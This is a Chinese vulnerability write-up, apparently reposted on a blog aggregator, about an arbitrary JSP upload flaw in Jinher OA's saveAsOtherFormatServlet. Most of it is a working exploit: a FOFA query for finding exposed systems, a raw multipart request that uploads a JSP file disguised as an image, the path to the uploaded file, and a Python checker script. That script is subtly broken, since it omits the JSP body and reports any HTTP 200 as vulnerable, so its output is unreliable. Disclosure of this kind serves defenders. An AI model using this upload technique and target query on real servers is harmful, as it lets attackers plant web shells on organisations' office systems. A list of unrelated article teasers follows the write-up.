金和OA saveAsOtherFormatServlet接口任意文件上传漏洞

news2024/11/22 22:52:44

声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

1. 产品简介

金和数字化智能办公平台(简称JC6)是一款结合了人工智能技术的数字化办公平台,为企业带来了智能化的办公体验和全面的数字化转型支持。同时符合国家信创认证标准,支持组织数字化转型,实现业务流程的数字化、智能化和协同化,提高企业竞争力。

2.漏洞描述

金和OA协同办公管理系统在saveAsOtherFormatServlet接口存在任意文件上传漏洞,攻击者可以上传jsp文件,也可以上传木马,容易造成严重的影响。

3.fofa查询语句

app="金和网络-金和OA"

 4.漏洞复现

poc

POST /jc6/servlet/saveAsOtherFormatServlet?fileName=tteesstt.jsp HTTP/1.1
Host: 
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Length: 207
Content-Type: multipart/form-data; boundary=74f0dc3df975274386a11be68cacc0e5

--74f0dc3df975274386a11be68cacc0e5
Content-Disposition: form-data; name="FileBlod"; filename="tteesstt.jsp"
Content-Type: image/png

<% out.println("tteesstt2");%>
--74f0dc3df975274386a11be68cacc0e5--

上传后,拼接上传文件的地址:https://xxxxx/jc6/upload/gwzw/tteesstt.jsp

5.poc.py

import requests

def verify(ip):

    url = f'{ip}/jc6/servlet/saveAsOtherFormatServlet?fileName=tteesstt.jsp'

    headers = {
        'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)',
        'Accept-Encoding': 'gzip, deflate',
        'Connection': 'close',
        'Upgrade - Insecure - Requests': '1',
        'Content-Length': '207',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Content-Type': 'multipart/form-data; boundary=74f0dc3df975274386a11be68cacc0e5'
    }

    payload = '''
    --74f0dc3df975274386a11be68cacc0e5
    Content-Disposition: form-data; name="FileBlod"; filename="tteesstt.jsp"
    Content-Type: image/png
    '''


    try:
        response = requests.post(url, headers=headers, data=payload,verify=False)
        # 验证成功输出相关信息
        if response.status_code == 200 :
            print(f"{ip}存在金和OA saveAsOtherFormatServlet接口任意文件上传漏洞!!!")

    except Exception as e:
        pass


if __name__ == '__main__':
    self = input('请输入目标主机IP地址:')
    verify(self)

6.整改意见

请联系厂家 http://www.jinher.com/升级

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1289426.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

css:flex布局中子元素高度height没有达到100%

css:flex布局中子元素高度height没有达到100%

目录 问题flex布局示例解决办法方式一方式二 参考 问题 css中使用flex布局中子元素高度height没有达到100% flex布局示例 希望实现两个盒子左右分布&#xff0c;内容垂直居中对齐 <style>.box {display: flex;align-items: center;border: 1px solid #eeeeee;}.box-l…
阅读更多...
人事档案管理系统设计与实现

人事档案管理系统设计与实现

摘 要 进入21世纪&#xff0c;已经步入了信息时代。单位的现代化管理也应该与时俱进。目前&#xff0c;企业的人事档案管理系统信息化已经越来越受到企业的重视。本项目立足于实习调查&#xff0c;严格按照学校毕设的规章制度&#xff0c;做到实事求是。本课题研究目的是&…
阅读更多...
推荐一款手持式ECU刷写设备,国产软件配合使用

推荐一款手持式ECU刷写设备,国产软件配合使用

同星智能开发的一款手持式ECU刷写工具——TF1011&#xff0c;在TSMaster中导入诊断流程即可离线一键刷写。在 PC 端完成配置后&#xff0c;在设备可以在手持式离线场景下实现&#xff1a;基于 UDS 协议的诊断和基于 UDS 协议的 Flash Bootloader 程序更新功能。 产品简介—TF10…
阅读更多...
2023-简单点-树莓派中的硬件通讯

2023-简单点-树莓派中的硬件通讯

树莓派中的通讯方式 串口通讯什么是串口通讯&#xff1f;串口设备的格式串口通讯的特点 tips并行通讯&#xff1f;基于网络的通讯?socket通讯 串口通讯 什么是串口通讯&#xff1f; 串行通信每次传输一个位元数据&#xff0c;并在连续进行单次过程的基础上进行通信。根据数据…
阅读更多...
SRMUVS-100VAC-2H2D欠电压监视继电器2常开2常闭35mm导轨安装

SRMUVS-100VAC-2H2D欠电压监视继电器2常开2常闭35mm导轨安装

系列型号&#xff1a; SRMUVS-58VAC-2H欠电压监视继电器&#xff1b;SRMUVS-100VAC-2H欠电压监视继电器&#xff1b; SRMUVS-110VAC-2H欠电压监视继电器&#xff1b;SRMUVS-220VAC-2H欠电压监视继电器&#xff1b; SRMUVS-58VAC-2H2D欠电压监视继电器&#xff1b;SRMUVS-100…
阅读更多...
【MySQL】Linux下如何用语言连接数据库?

【MySQL】Linux下如何用语言连接数据库?

用语言连接数据库 前言正式开始创建一个等会专门演示语言连接的库和用户连接mysql要用到的动静态库以及头文件手动下载mysql官方提供的库&#xff08;可以跳过不看&#xff09;下载MySQL时自动安装的库 用C连接数据库官方文档对于编译链接的解释对库的操作函数接口介绍mysql_in…
阅读更多...
Python (二) 读写excel文件

Python (二) 读写excel文件

程序员的公众号&#xff1a;源1024&#xff0c;获取更多资料&#xff0c;无加密无套路&#xff01; 最近整理了一波电子书籍资料&#xff0c;包含《Effective Java中文版 第2版》《深入JAVA虚拟机》&#xff0c;《重构改善既有代码设计》&#xff0c;《MySQL高性能-第3版》&…
阅读更多...
怎么把拍下来的实体印章公章转为透明电子章,并粘贴到word里面?

怎么把拍下来的实体印章公章转为透明电子章,并粘贴到word里面?

用word打开合同文档 插入公章图片&#xff08;jpg/png无所谓&#xff09; 右击图片→裁剪到你爽为止 右击图片→设置图片格式→高度和宽度设置为4厘米&#xff08;具体大小根据你的实际情况来&#xff09; 根据实际情况调整亮度和对比度 设置透明色 将印章衬于文字下方&#xf…
阅读更多...
zxjy004- 子模块service及子子模块service_edu搭建

zxjy004- 子模块service及子子模块service_edu搭建

1、新建service module(maven工程&#xff0c;子模块) 1.1 右键 --> new moduel --->选择maven --->完成 1.2. 添加模块类型是 pom 2、引入项目需要的依赖 <?xml version"1.0" encoding"UTF-8"?> <project xmlns"http://maven.…
阅读更多...
springboot使用Validator参数校验

springboot使用Validator参数校验

引用&#xff1a;https://www.cnblogs.com/yang-yz/p/17576507.html Validator校验框架遵循了 jsr-303验证规范(参数校验规范) JSR : java specification requests 为了解决开发人员在校验参数方面&#xff0c;少写代码 依赖&#xff1a; <dependency><groupId>o…
阅读更多...
Navicat 与 华为云 GaussDB 合作再升级,赋能 GaussDB 分布式数据库

Navicat 与 华为云 GaussDB 合作再升级,赋能 GaussDB 分布式数据库

2023 年第三季度&#xff0c;Navicat 首次支持了华为云 GaussDB 主备版数据库。经过双方团队进一步的深化合作&#xff0c;Navicat 完成了 GaussDB 分布式的研发适配工作&#xff0c;赋能 GaussDB 全域数据库产品。 GaussDB 数据库分为主备版和分布式版两种模式。主备版适用于…
阅读更多...
Java二阶知识点总结(一)Maven

Java二阶知识点总结(一)Maven

一、Maven概念 Maven是一个项目管理工具&#xff0c;其主要作用有2点 依赖管理&#xff1a;管理项目依赖的各种jar包自动构建&#xff1a;项目构建的过程&#xff0c;从编译、测试、运行、打包到安装的过程可以一键执行 二、Maven工程的目录结构 src/main/java&#xff1a;…
阅读更多...
三相电表可以当作高压电表使用吗?

三相电表可以当作高压电表使用吗?

在电力系统中&#xff0c;为了准确测量和计量电能的使用情况&#xff0c;电表起着至关重要的作用。与此同时&#xff0c;为了满足不同电网的需求&#xff0c;各种类型的电表被研发和设计出来。其中&#xff0c;三相电表作为常见的一种类型&#xff0c;广泛应用于低压电网中。但…
阅读更多...
html刷题笔记

html刷题笔记

1 em 12 pt 16 px 100% source元素为audio、video、picture元素指定多个媒体文件 margin是用来隔开元素与元素的间距&#xff1b;padding是用来隔开元素与内容的间隔。 margin用于布局分开元素使元素与元素互不相干&#xff1b;padding用于元素与内容之间的间隔&#xff0c;…
阅读更多...
js基础之事件监听案例入门

js基础之事件监听案例入门

事件绑定 代码 <!DOCTYPE html> <html lang"en"> <head><meta charset"UTF-8"><meta name"viewport" content"widthdevice-width, initial-scale1.0"><title>Document</title> </head&…
阅读更多...
子查询在SQL中的应用和实践

子查询在SQL中的应用和实践

作者&#xff1a;CSDN-川川菜鸟 在SQL中&#xff0c;子查询是一种强大的工具&#xff0c;用于解决复杂的数据查询问题。本文将深入探讨子查询的概念、类型、规则&#xff0c;并通过具体案例展示其在实际应用中的用途。 文章目录 子查询概念子查询的类型子查询的规则实际案例分析…
阅读更多...
Live800:客服人员的压力来自于哪些方面?企业如何减轻客服压力?

Live800:客服人员的压力来自于哪些方面?企业如何减轻客服压力?

客服人员是企业中非常重要的一支队伍&#xff0c;他们承担着与客户直接沟通的重要任务。然而&#xff0c;客服工作并不是一项轻松的工作&#xff0c;他们常常面临着各种各样的压力。那么&#xff0c;客服人员的压力究竟来自哪些方面&#xff1f;企业又应该如何减轻客服人员的压…
阅读更多...
Slurm集群管理系统

Slurm集群管理系统

Slurm集群管理系统 Slurm&#xff08;Simple Linux Utility for Resource Management&#xff0c;https://slurm.schedmd.com/&#xff09;是一个开源的、容错的、高度可扩展的集群管理和作业调度系统&#xff0c;适用于大型和小型高性能计算&#xff08;HPC&#xff09;集群。…
阅读更多...
小团队是否值得购买企业网盘的策略分析

小团队是否值得购买企业网盘的策略分析

企业网盘的风越来越大&#xff0c;对于小团队而言&#xff0c;真的值得购入企业网盘吗&#xff1f;在购买企业服务之前&#xff0c;首先需要考虑的就是自身的需求。 您可以根据以下几个方面判断自己的团队是否真的需要购买企业网盘&#xff1f; 1、办公需求&#xff1a;企业网…
阅读更多...
MES管理系统在生产计划排程中的应用与价值

MES管理系统在生产计划排程中的应用与价值

随着制造业市场竞争的日益激烈和客户需求的多样化&#xff0c;传统的生产计划排程方式已经无法满足企业的需求。为了提升生产计划的效率和准确性&#xff0c;越来越多的企业开始引入MES管理系统这一先进的工具。那么&#xff0c;MES管理系统到底是什么&#xff0c;又是如何解决…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023